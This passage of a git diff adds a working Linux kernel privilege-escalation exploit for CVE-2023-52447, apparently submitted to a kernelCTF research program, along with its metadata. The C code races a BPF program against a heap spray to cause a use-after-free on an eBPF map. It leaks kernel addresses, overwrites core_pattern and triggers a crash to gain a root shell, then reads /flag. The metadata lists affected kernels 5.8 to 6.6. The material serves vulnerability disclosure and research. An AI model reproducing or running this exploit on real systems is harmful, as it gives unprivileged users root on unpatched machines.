		BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0,
			     BPF_FUNC_get_numa_node_id),
		BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8,
			    0), // Now BPF_REG_8 is freed and reallocated as an array_of_maps
		BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_0,
			    0), // store the leaked arraymap address into our arraymap as a value
		BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, -0x110),
		BPF_STX_MEM(BPF_W, BPF_REG_8, BPF_REG_0,
			    0), // make index 0 of the array_of_maps point at our controlled fake map
		BPF_MOV64_IMM(BPF_REG_0, 0),
		BPF_EXIT_INSN(),
	};
	*ret = calloc(1, sizeof(prog));
	memcpy(*ret, prog, sizeof(prog));
	return INST(prog);
}

volatile char *signal_addr;
int spray_fd[0x100];
int samplemap, victim;
int ringbuf[2];
int oob[0x20];

void *spray_job(void *x)
{
	while (signal_addr[0] == 0)
		;
	for (int i = 0; i < 0x100; i++) {
		spray_fd[i] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4,
					     0x30, samplemap);
		update_elem(spray_fd[i], 0, victim);
	}
}
int check_core()
{
	// Check if /proc/sys/kernel/core_pattern has been overwritten
	char buf[0x100] = {};
	int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
	read(core, buf, sizeof(buf));
	close(core);
	return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
}
void crash(char *cmd)
{
	int memfd = memfd_create("", 0);
	SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff));
	dup2(memfd, 666);
	close(memfd);
	while (check_core() == 0)
		sleep(1);
	puts("Root shell !!");
	/* Trigger a crash so the kernel executes the program from core_pattern, which is our "root" binary */
	*(size_t *)0 = 0;
}
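/*
 * main() flow: when re-executed with argv[1] set we are running as the root
 * coredump helper; otherwise shape the heap, run the race, leak the kernel
 * base, corrupt the neighbouring array_of_maps, rewrite core_pattern, and
 * finally crash a child to trigger the helper.
 */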
int main(int argc, char **argv)
{
	if (argc > 1) {
		// This section of code will be executed as root!
		int pid = strtoull(argv[1], 0, 10);
		int pfd = syscall(SYS_pidfd_open, pid, 0);
		int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
		int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
		int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
		dup2(stdinfd, 0);
		dup2(stdoutfd, 1);
		dup2(stderrfd, 2);
		/* Get the flag and power off immediately to speed up the next attempt in the PR verification workflow */
		system("cat /flag;echo o>/proc/sysrq-trigger");
		exit(0);
	}
	setvbuf(stdout, 0, 2, 0);

	// samplemap is the inner map used when creating array_of_maps
	samplemap = bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, 8, 0x30, 0);

	// Allocate some array of maps before victim
	for (int i = 0; i < 0x10; i++)
		oob[i] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4, 0x30,
					samplemap);
	victim = bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, 8, 0x30, 0);

	// Allocate some array of maps after victim
	for (int i = 0; i < 0x10; i++)
		oob[i + 0x10] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4,
					       0x30, samplemap);

	// Create ringbufs for the time-consuming job
	ringbuf[0] = bpf_create_map(BPF_MAP_TYPE_RINGBUF, 0, 0, 0x20000000, 0);
	ringbuf[1] = bpf_create_map(BPF_MAP_TYPE_RINGBUF, 0, 0, 0x20000000, 0);

	// Create an arraymap for storing the leaked heap address
	int arraymap = bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, 8, 0x30, 0);

	// Create a mmapable arraymap to signal that we have stored the target arraymap
	int signal = bpf_create_map_mmap(BPF_MAP_TYPE_ARRAY, 4, 8, 0x30, 0);

	// The target arraymap will be stored into this array of maps.
	int array_of_map = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4,
					  0x30, samplemap);

	// The target will be freed in the middle of the bpf program.
	int target = bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, 8, 0x30, 0);

	// mmap the arraymap region so userspace can poll the signal.
	signal_addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED,
			   signal, 0);

	// store target into array_of_map
	update_elem(array_of_map, 0, target);

	// drop the fd so the array_of_map holds the only reference to target
	close(target);

	// init and load the race bpf program.
	int sfd[2] = {};
	struct bpf_insn *race_prog = NULL;
	int race_prog_cnt = init_race_prog(&race_prog, array_of_map, ringbuf,
					   arraymap, signal);
	load_bpf_prog(race_prog, race_prog_cnt, sfd);

	// Spawn two threads: one triggers the bpf program, one sprays to reclaim the target as an array_of_maps.
	pthread_t tid, spray_tid;
	pthread_create(&tid, 0, write_msg, &sfd[0]);
	pthread_create(&spray_tid, 0, spray_job, 0);

	while (signal_addr[0] == 0)
		;
	// Free target
	update_elem(array_of_map, 0, victim);
	pthread_join(tid, 0);
	pthread_join(spray_tid, 0);

	size_t kheap = get_elem(arraymap, 0);
	size_t kaddr = 0;

	for (int i = 0; i < 0x100; i++) {
		// If we can leak, it means we have overwritten victim's max_entries and index_mask
		size_t leak = leak_kbase((int)spray_fd[i]);
		if (leak) {
			kaddr = leak;
			break;
		}
		else
			close(spray_fd[i]);
	}
	printf("Kaddr: 0x%lx\n", kaddr);
	printf("Kheap: 0x%lx\n", kheap);

	target = 0;
	for (int i = 0; i < 0x20; i++) {
		update_elem(oob[i], 0, samplemap);
		// OOB-read through the victim map to identify which array_of_maps is allocated right after it.
		size_t val = get_elem(victim, (0x400 + 0x110 - 0x110) / 8);
		if (val) {
			target = i;
			break;
		}
	}
	size_t *p = (size_t *)"|/proc/%P/fd/666 %P";

	// Store the address (core_pattern - struct_bpf_array_offset) we want to write through.
	update_elem(victim, (0x400 + 0x110 - 0x110) / 8, kaddr);

	// Store the contents we want to write in the arraymap
	for (int i = 0; i < 4; i++) {
		update_elem(victim, i, p[i]);
	}
	// Trigger the bpf program to overwrite core_pattern
	write_core_pattern(oob[target], victim);
	system("cat /proc/sys/kernel/core_pattern");
	if (fork() == 0)
		crash("");
	while (1)
		sleep(100);
}
diff --git a/pocs/linux/kernelctf/CVE-2023-52447_cos/metadata.json b/pocs/linux/kernelctf/CVE-2023-52447_cos/metadata.json
new file mode 100755
index 00000000..6add7984
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-52447_cos/metadata.json
@@ -0,0 +1,30 @@
{
    "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json",
    "submission_ids": [
        "exp134"
    ],
    "vulnerability": {
        "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=876673364161da50eed6b472d746ef88242b2368",
        "cve": "CVE-2023-52447",
        "affected_versions": [
            "5.8 - 6.6"
        ],
        "requirements": {
            "attack_surface": [],
            "capabilities": [],
            "kernel_config": [
                "CONFIG_BPF_SYSCALL"
            ]
        }
    },
    "exploits": {
        "cos-105-17412.294.10": {
            "uses": [],
            "requires_separate_kaslr_leak": false,
            "stability_notes": "succeeds 8 times out of 10 runs"
        }
    }
}
diff --git a/pocs/linux/kernelctf/CVE-2023-52447_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2023-52447_cos/original.tar.gz
new file mode 100755
index 00000000..3b1b7128
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-52447_cos/original.tar.gz differ